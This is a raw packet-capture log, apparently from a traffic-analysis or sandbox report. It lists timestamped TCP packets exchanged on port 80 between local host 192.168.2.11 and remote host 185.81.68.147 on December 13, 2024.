                                                                                                                                                                                                Dec 13, 2024 08:18:53.768121958 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.769129992 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.769247055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.769376993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.770324945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.770422935 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.770503044 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.771523952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.771630049 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.771670103 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.772732973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.772820950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.772897959 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.773904085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.774010897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.774084091 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.775079966 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.775185108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.775223970 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.776284933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.776390076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.776429892 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.777468920 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.777578115 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.777654886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.778841019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.778961897 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.779040098 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.779863119 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.779989004 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.780029058 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.781234026 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.781351089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.781390905 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.782259941 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.782347918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.782423973 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.783442974 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.783541918 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.783611059 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.784657955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.784781933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.784821033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.785845995 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.785963058 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.786046982 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.787041903 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.787149906 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.787228107 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.788219929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.788345098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.788420916 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.789443970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.789455891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.789542913 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.790613890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.790734053 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.790776014 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.791807890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.791918993 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.792000055 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.792983055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.793091059 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.793170929 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.794192076 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.794281960 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.794430017 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.795382023 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.795485020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.795568943 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.796583891 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.796714067 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.796797991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.797769070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.797898054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.797980070 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.799335003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.799423933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.799503088 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.800185919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.800288916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.800368071 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.801374912 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.801498890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.801578045 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.802552938 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.802660942 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.802747965 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.803782940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.803890944 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.803975105 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.804945946 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.805062056 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.805150032 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.806128025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.806324959 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.806406975 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.807341099 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.807441950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.807518005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.808542967 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.808645964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.808762074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.809742928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.809834003 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.809911966 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.810920954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.811041117 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.811117887 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.812115908 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.812230110 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.812390089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.813330889 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.813473940 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.813556910 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.814480066 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.814603090 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.814716101 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.815695047 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.815814972 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.815922022 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.816917896 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.816988945 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.817060947 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.818106890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.818208933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.818289995 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.819289923 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.819402933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.819477081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.820449114 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.871241093 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.949668884 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.949755907 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.949853897 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.950221062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.950498104 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.950581074 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.950601101 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.954766989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.954778910 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.954787970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.954797983 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.954893112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.954936028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.955229998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.955279112 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.955363989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.956391096 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.956446886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.956536055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.957731962 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.957743883 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.957787991 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.958725929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.958780050 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.958877087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.960048914 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.960061073 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.960071087 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.960143089 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.960155964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.960186005 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.961251020 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.961298943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.961299896 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.962464094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.962538004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.962568998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.963685989 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.963737965 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.963793039 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.964835882 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.964888096 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.964920998 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.966008902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.966058969 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.966136932 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.967222929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.967267036 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.967281103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.968422890 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.968473911 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.968513012 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.969635010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.969683886 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.969712973 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.970866919 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.970916033 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.970943928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.971985102 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.972037077 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.972075939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.973186016 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.973236084 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.973289013 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.974378109 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.974426031 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.974466085 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.975569010 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.975620985 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.975658894 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.976772070 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.976815939 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.976829052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.977987051 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.978045940 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.978079081 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.979197025 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.979254007 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.979281902 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.981528044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.981584072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.982662916 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984033108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984045029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984071970 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984081984 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984179020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984179020 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.984988928 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.985039949 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.985167027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.986326933 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.986340046 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.986397028 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.987415075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.987468004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.987590075 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.988656044 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.988723993 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.988826036 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.989809990 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.989855051 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.989975929 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.991058111 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.991067886 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.991117001 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.992144108 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.992216110 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.992295027 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.993436098 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.993448019 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.993489027 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.994579077 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.994631052 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.994776011 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.995759964 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.995811939 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.995950937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.996939898 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.996999025 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.997116089 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.998307943 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.998320103 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.998353004 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.998471022 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.998485088 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.998507977 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.999439955 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:53.999497890 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:53.999533892 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.000690937 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.000755072 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.000802994 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.001831055 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.001880884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.001930952 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.003016949 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.003074884 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.003149986 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007514954 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007595062 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007759094 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007771015 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007781029 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007792950 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007817030 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007842064 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.007960081 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.008964062 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.008979082 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.009018898 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.010195017 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.010246992 CET4972680192.168.2.11185.81.68.147
                                                                                                                                                                                                Dec 13, 2024 08:18:54.010328054 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.010786057 CET8049726185.81.68.147192.168.2.11
                                                                                                                                                                                                Dec 13, 2024 08:18:54.010797024 CET8049726185.81.68.147192.168.2.11
